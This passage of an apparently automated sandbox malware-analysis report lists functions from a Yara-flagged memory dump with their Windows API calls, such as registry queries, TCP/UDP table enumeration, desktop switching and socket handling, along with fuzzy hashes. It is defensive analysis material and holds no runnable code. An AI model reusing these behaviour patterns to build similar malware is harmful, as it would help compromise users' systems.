                                                                                    • String ID:
                                                                                    • API String ID: 421069059-0
                                                                                    • Opcode ID: 74471da0de8e7282c99f549b9d7baa53fe92302becf82ba45710c5f6762abaa4
                                                                                    • Instruction ID: 4230b229a0c3933f6addaa76546d41742dc7f8ee09f10ea5427e1312773bba90
                                                                                    • Opcode Fuzzy Hash: 74471da0de8e7282c99f549b9d7baa53fe92302becf82ba45710c5f6762abaa4
                                                                                    • Instruction Fuzzy Hash: 87218032200505AFDB00CF69E588A997BB5FF48325F00426AFC08CB284C775F996CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC0C20, Relevance: 7.6, APIs: 5, Instructions: 77registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,04EC963F,?,?), ref: 04EC0C33
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?,?), ref: 04EC0C5F
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,00000000), ref: 04EC0C92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC0CB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1586453840-0
                                                                                    • Opcode ID: e9b5ae0a9447bca9bfc1c4bfb9a73fa2408951cdef538c17f10e30b678b4cdf1
                                                                                    • Instruction ID: 9fa2e97bada11b6eb818b4cb1991b04992dd8e07b6186d566d172b9383b56343
                                                                                    • Opcode Fuzzy Hash: e9b5ae0a9447bca9bfc1c4bfb9a73fa2408951cdef538c17f10e30b678b4cdf1
                                                                                    • Instruction Fuzzy Hash: A3215171B02218FBDF209EE1ED05FAEBB7CEF40715F0401A9ED09E2240E735AA118B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED5660, Relevance: 7.6, APIs: 5, Instructions: 77windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                    • String ID:
                                                                                    • API String ID: 2015114452-0
                                                                                    • Opcode ID: 2fe832d7bec575ce5539f10106bac7e9058fbe8efac782cf904ef9d6ca5416df
                                                                                    • Instruction ID: 22168edb5ac775da9beb0102e7c08bef2ce803ade0f5659b51ceabff7a5a003f
                                                                                    • Opcode Fuzzy Hash: 2fe832d7bec575ce5539f10106bac7e9058fbe8efac782cf904ef9d6ca5416df
                                                                                    • Instruction Fuzzy Hash: E2218371B00208BBDB14DFA9DC85FED77B8EB88725F201619E915EB2C4DA74BC418B64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBDB70, Relevance: 7.6, APIs: 5, Instructions: 75memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EBD550: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                      • Part of subcall function 04EBD550: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                      • Part of subcall function 04EBD960: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                      • Part of subcall function 04EBD960: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                    • LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                    • LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC05
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$AddressLibraryLoadProc$AllocSize
                                                                                    • String ID:
                                                                                    • API String ID: 3284714279-0
                                                                                    • Opcode ID: 1e8a97256b61d7014c562a710158382544f3879acdd533e30ac442329be83a3e
                                                                                    • Instruction ID: 4d0b9b6d36cc14a888995225f982767abe74c5005f4eab7bb910c435a2f3cf4f
                                                                                    • Opcode Fuzzy Hash: 1e8a97256b61d7014c562a710158382544f3879acdd533e30ac442329be83a3e
                                                                                    • Instruction Fuzzy Hash: 4B21D575901205ABD714EFA5DC88DAFBBBCEF84309B04006CF855E3205DE34AE018BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEA32B, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 04EEA334
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EEA357
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04EEA37D
                                                                                    • _free.LIBCMT ref: 04EEA390
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04EEA39F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 2278895681-0
                                                                                    • Opcode ID: 89c32ee23132d9bcb71cca0037b4ea9b2d22cbaafa417dfafb5f9db645ebb957
                                                                                    • Instruction ID: f0d2c4aa571356aa75f5a4e6c2a28857504f8e107a9916a0e3d77fe8de2e553f
                                                                                    • Opcode Fuzzy Hash: 89c32ee23132d9bcb71cca0037b4ea9b2d22cbaafa417dfafb5f9db645ebb957
                                                                                    • Instruction Fuzzy Hash: BE0171726026157F63216AAB9C88C7F7A6DDFC6AA6315523DBD04D2244EE659C0181B0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED3FD0, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED3FE8
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED400A
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED402D
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED4057
                                                                                    • SetLastError.KERNEL32(00000057,?,?,?,?,04ED3FB2,00000000,?,?), ref: 04ED405E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$CompletionEnterLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 4119631813-0
                                                                                    • Opcode ID: 9633b42a93b288c5438a2a5b6fa86a57237589ffe5a8397000a3a6fc4287fb12
                                                                                    • Instruction ID: 8438cb7a37509567671faf5fd955e8cbe09b79dd736c959cd3166bbadbc0d69e
                                                                                    • Opcode Fuzzy Hash: 9633b42a93b288c5438a2a5b6fa86a57237589ffe5a8397000a3a6fc4287fb12
                                                                                    • Instruction Fuzzy Hash: 62112732200204EBCB208F55DC48FAAB779FF94716F109059FD0587186C736E942CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECF490, Relevance: 7.6, APIs: 5, Instructions: 60threadnetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECF495
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EB8125,74E5F5E0,00000000,80004005,80004005,80004005,80004005,80004005,?,04EB8B17,04EFD048,?), ref: 04ECF552
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                      • Part of subcall function 04ECE500: SetEvent.KERNEL32(?,?,04EB8B5E,04EFD024,?), ref: 04ECE527
                                                                                      • Part of subcall function 04ECE500: CloseHandle.KERNEL32(00000000,?,04EB8B5E,04EFD024,?), ref: 04ECE54A
                                                                                    • WSACloseEvent.WS2_32(00000000), ref: 04ECF4FB
                                                                                    • shutdown.WS2_32(?,00000001), ref: 04ECF513
                                                                                    • closesocket.WS2_32(?), ref: 04ECF51C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 880953794-0
                                                                                    • Opcode ID: 579eb13004539c08b5e4ed91f633cef30d9a8d00ea356c782f81c644f154ce55
                                                                                    • Instruction ID: a9ba70f199c4de5b39e02c5c48577c56a22a4c5eb4f234bf850a594c58ae5d7a
                                                                                    • Opcode Fuzzy Hash: 579eb13004539c08b5e4ed91f633cef30d9a8d00ea356c782f81c644f154ce55
                                                                                    • Instruction Fuzzy Hash: 97211C70700602ABD7149F29D44CBA9BBA6FF8431AF144219E519876D0CB75F8A6CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE8660, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,3D21FB31,-00000004,04EE138C,04EE817F,3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8665
                                                                                    • _free.LIBCMT ref: 04EE869A
                                                                                    • _free.LIBCMT ref: 04EE86C1
                                                                                    • SetLastError.KERNEL32(00000000,00000001), ref: 04EE86CE
                                                                                    • SetLastError.KERNEL32(00000000,00000001), ref: 04EE86D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 3a21a4f0408bc8b1eb5cbc3a490902b89e55125cba5cdfcd2b1558107c99cdf3
                                                                                    • Instruction ID: 40439ca08924ed94c8cfd54d923a42627628996b82d5b8db9257281c4709bab9
                                                                                    • Opcode Fuzzy Hash: 3a21a4f0408bc8b1eb5cbc3a490902b89e55125cba5cdfcd2b1558107c99cdf3
                                                                                    • Instruction Fuzzy Hash: 34018136241602EBE3127B776C4897B266DFBC12AD7216D26FC15A3280FF66EC014165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5620, Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC5637
                                                                                    • GetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC563E
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 04EC565C
                                                                                    • SetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC5679
                                                                                    • CloseDesktop.USER32(00000000,?,00000000), ref: 04EC5684
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                                                    • String ID:
                                                                                    • API String ID: 2068333509-0
                                                                                    • Opcode ID: 6be30a3e29bef1a6e5540f26ddf1a4c2260d9f4a2cc96c3de22cf91e71f90082
                                                                                    • Instruction ID: 7d7ebc50c54e59a609d6ef0a659185b3164fd9267f22b41c444e1d75531d774d
                                                                                    • Opcode Fuzzy Hash: 6be30a3e29bef1a6e5540f26ddf1a4c2260d9f4a2cc96c3de22cf91e71f90082
                                                                                    • Instruction Fuzzy Hash: 9B01D635600118BBD720AF75AC05AFE77ACEF84352F0000AEFC05C7240DE78AE818794
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB4A0, Relevance: 7.5, APIs: 5, Instructions: 46fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(0000020E), ref: 04EBB4E9
                                                                                    • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000002,00000080,00000000), ref: 04EBB51B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EBB522
                                                                                    • SetEvent.KERNEL32(?), ref: 04EBB52F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateDeleteEventHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1798639166-0
                                                                                    • Opcode ID: 13ff20f9ee8c445bd5a31e069bf682696fd6779346550f34482df0e55c1eb1ca
                                                                                    • Instruction ID: 3a0929708bb190fa199d0fa32475387e168d0ee9bd68dee71155df3623fcc4a8
                                                                                    • Opcode Fuzzy Hash: 13ff20f9ee8c445bd5a31e069bf682696fd6779346550f34482df0e55c1eb1ca
                                                                                    • Instruction Fuzzy Hash: 2301F172802344AEEB109B64F80CFA63B69EB40319F54C154F1968A8C3CB2AF891CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBDCA0, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EBD960: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                      • Part of subcall function 04EBD960: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalSize.KERNEL32 ref: 04EBDCB8
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EBDCC6
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDCE9
                                                                                    • LocalSize.KERNEL32 ref: 04EBDCEC
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDD03
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                    • String ID:
                                                                                    • API String ID: 3285080383-0
                                                                                    • Opcode ID: 1e1e7d21a46160e7e96f1417a71786ed92460bf59a79fdbfe19ade66ee85556f
                                                                                    • Instruction ID: 252fc688c47c38f208033c78530902fbed303ec6f6f4b0fefec1835f366e9370
                                                                                    • Opcode Fuzzy Hash: 1e1e7d21a46160e7e96f1417a71786ed92460bf59a79fdbfe19ade66ee85556f
                                                                                    • Instruction Fuzzy Hash: 3BF0D1B5901218BBD714ABB59C84CABBFACEF49255B0002A9FD49A7245DE35AD00CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBDC30, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EBD550: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD57F
                                                                                      • Part of subcall function 04EBD550: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04EBD5A1
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC48
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EBDC56
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDC79
                                                                                    • LocalSize.KERNEL32 ref: 04EBDC7C
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDC93
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                                                    • String ID:
                                                                                    • API String ID: 3285080383-0
                                                                                    • Opcode ID: 9c3df24ddaeecb2718bc5d385563465697ff3e457b8afe27bb4aa1a5ffad4fa4
                                                                                    • Instruction ID: 5111b3ef3c247dd88b6d25aa92c9187943d71862de49c662beb6c02e7f23a79a
                                                                                    • Opcode Fuzzy Hash: 9c3df24ddaeecb2718bc5d385563465697ff3e457b8afe27bb4aa1a5ffad4fa4
                                                                                    • Instruction Fuzzy Hash: 6DF0F9B5901218BBD714ABB59C44CBBBF6CEF49255B000199FD09A3245DE35AD00CBF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED27D0, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,7761EB70,?,?,?,04ED25DF,?,?,?,?), ref: 04ED27E7
                                                                                    • EnterCriticalSection.KERNEL32(?,7761EB70,?,?,?,04ED25DF,?,?,?,?), ref: 04ED27FC
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,04ED25DF,?,?,?,?), ref: 04ED2814
                                                                                    • shutdown.WS2_32 ref: 04ED282D
                                                                                    • closesocket.WS2_32(?), ref: 04ED2834
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter$Leaveclosesocketshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 3384241815-0
                                                                                    • Opcode ID: 40a5c25eb107fd8956f0c2704987a5ddc05f7d70df0afc7a7499fb6367605583
                                                                                    • Instruction ID: e6b0676c3694cc3555feef5a6fdf5a057a1b453b3749a2cb719291a168bd049f
                                                                                    • Opcode Fuzzy Hash: 40a5c25eb107fd8956f0c2704987a5ddc05f7d70df0afc7a7499fb6367605583
                                                                                    • Instruction Fuzzy Hash: A1016933201615BBCB119F959C48AEAB768FF89322F104155FB2593180CB74B956DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEBDA1, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EEBDB9
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEBDCB
                                                                                    • _free.LIBCMT ref: 04EEBDDD
                                                                                    • _free.LIBCMT ref: 04EEBDEF
                                                                                    • _free.LIBCMT ref: 04EEBE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 621bd30156779c2ac728451efbd564204d9f82550cda581810f23b07fb6baa3a
                                                                                    • Instruction ID: 30bd6b21d03b4ce38a95d8328f3bc1b88f69d228b9198169b9d7a0e832181532
                                                                                    • Opcode Fuzzy Hash: 621bd30156779c2ac728451efbd564204d9f82550cda581810f23b07fb6baa3a
                                                                                    • Instruction Fuzzy Hash: CDF01D72614608AF9620EB5AF585D3A77D9FB447187642D06F448E7600CB35FC808A61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7B70, Relevance: 7.5, APIs: 5, Instructions: 38synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7B83
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC7B91
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BA3
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BAD
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC7BC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1896077197-0
                                                                                    • Opcode ID: 55897d1751347a77882db7457e84b3384cafc151e80a573d82fa0873257a0715
                                                                                    • Instruction ID: e59cd98f6ff0b348bba8b7c06ebac542101701b9df2f13dee94a8eb39e4c3966
                                                                                    • Opcode Fuzzy Hash: 55897d1751347a77882db7457e84b3384cafc151e80a573d82fa0873257a0715
                                                                                    • Instruction Fuzzy Hash: 13F0A471100305ABD321AF69DC09EC7BBE9DF55711F10891EEA9692190DA71F440CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBAA40, Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA54
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA61
                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA6C
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAA8F
                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00001000,04EBAC2B,0000006C,?,80004005,?,04EB8B5E,04EFD024,?), ref: 04EBAAA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$DeleteLeave$Enter
                                                                                    • String ID:
                                                                                    • API String ID: 2043033798-0
                                                                                    • Opcode ID: 849dc29ab4b8fb46051a7722ef8e64b9bf4a93cf7dce84f62b1988ffa3b797b6
                                                                                    • Instruction ID: d214e23636c0c6defba9109e3f90b5a34d8e4e28db91afb679f85f45210d5fb8
                                                                                    • Opcode Fuzzy Hash: 849dc29ab4b8fb46051a7722ef8e64b9bf4a93cf7dce84f62b1988ffa3b797b6
                                                                                    • Instruction Fuzzy Hash: 5BF0E772102912EBDB15DB65E908BEAB7A8FF88316F001119E95682D48CB38F655CBD4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7BF0, Relevance: 7.5, APIs: 5, Instructions: 28synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7C00
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C0E
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C20
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C2A
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,04EB97AF,?,Function_000568D8,00000000), ref: 04EC7C3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1896077197-0
                                                                                    • Opcode ID: 47475061be921e7884ee4ad30b945f40a6f69872a63215804fd727b3cb4d0613
                                                                                    • Instruction ID: 9c061ef0c53b07aac1251321f37ac1503f79d319b4d36ef1931467199307b35a
                                                                                    • Opcode Fuzzy Hash: 47475061be921e7884ee4ad30b945f40a6f69872a63215804fd727b3cb4d0613
                                                                                    • Instruction Fuzzy Hash: 04F012751007019BD731AF26EC09E87FBF9EF88311B114A1EEA9692164DA70F841DF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB1780, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 390COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: $
                                                                                    • API String ID: 48624451-227171996
                                                                                    • Opcode ID: 7c2d2970c65fd40470a2d4540faab19e198d5f95e2861e39f1a42ba4d99bb9d6
                                                                                    • Instruction ID: ddec9c8062b2cf3c0dc51c3d75aeff46a8c9c80f7752066d1960f647c1db80e1
                                                                                    • Opcode Fuzzy Hash: 7c2d2970c65fd40470a2d4540faab19e198d5f95e2861e39f1a42ba4d99bb9d6
                                                                                    • Instruction Fuzzy Hash: 0CD1FA71A00605EBDB15CF79C8E0AEBF768BF053A8F189669E8959B241E730F950C7D0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB3540, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 287COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB35EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 909987262-4289949731
                                                                                    • Opcode ID: f0309da5e8c52e7cfbefa17ec3802ac54d890f0d31cb7c9a36f617c16875445c
                                                                                    • Instruction ID: 383ee5dd55747c6c8eb085d2c69a7112812ebaf7d52c96d74196115f89eed3f5
                                                                                    • Opcode Fuzzy Hash: f0309da5e8c52e7cfbefa17ec3802ac54d890f0d31cb7c9a36f617c16875445c
                                                                                    • Instruction Fuzzy Hash: 1581D572600214DBC724DF68E88199BB3E5EF847247205A2EED96CB650EB31F90587E5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC0680, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: vector<T> too long
                                                                                    • API String ID: 0-3788999226
                                                                                    • Opcode ID: 56c40549759a87344701309ce026ba157ba0d853282343d5241ec931788222f1
                                                                                    • Instruction ID: 93aaed4be9aa0a5abaab4fd1aebd924dcdcaef135184fdd3ebd38f0f58fb6c8e
                                                                                    • Opcode Fuzzy Hash: 56c40549759a87344701309ce026ba157ba0d853282343d5241ec931788222f1
                                                                                    • Instruction Fuzzy Hash: 47517FB1A00209DFDB18DF68C981AAEB7A5FF48314F14862DF915DB384E771E911CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECDD70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 04ECDD93
